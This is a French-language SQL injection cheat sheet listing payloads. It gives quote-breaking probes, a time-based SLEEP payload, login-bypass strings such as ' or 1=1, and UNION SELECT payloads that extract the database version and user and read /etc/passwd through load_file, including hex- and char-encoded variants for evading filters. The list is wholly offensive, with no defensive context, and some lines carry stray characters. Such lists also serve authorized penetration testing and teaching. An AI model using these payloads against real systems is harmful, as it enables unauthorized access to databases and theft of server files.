Injection SQL

Payloads

• ‘
• )’
• “
• `
• ‘)
• “)
• `)
• ‘))
• “))
• `))
• -SLEEP(30); #

Contournement de la vérification de mots de passe

• ‘ or 1=1 —
• ‘ or ‘1’=1
• ‘ or 1=1 –+
• user’ or 1=1;#
• user’ or 1=1 LIMIT 1;#
• user’ or 1=1 LIMIT 0,1;#

Injections basés sur les unions SQL

• order by 1
• UNION SELECT 1,2,3 — –
• ‘ UNION SELECT 1,@@version,3 — –
  4 ‘
• ‘ UNION SELECT 1,user(),3 — –
• ‘ UNION SELECT 1,load_file(‘/etc/passwd’),3 — –
• ‘ UNION SELECT 1,load_file(0x2f6574632f706173737764),3 — – //encodage hexa
• ‘ UNION SELECT 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100))
  9 ,3 — – //encodage char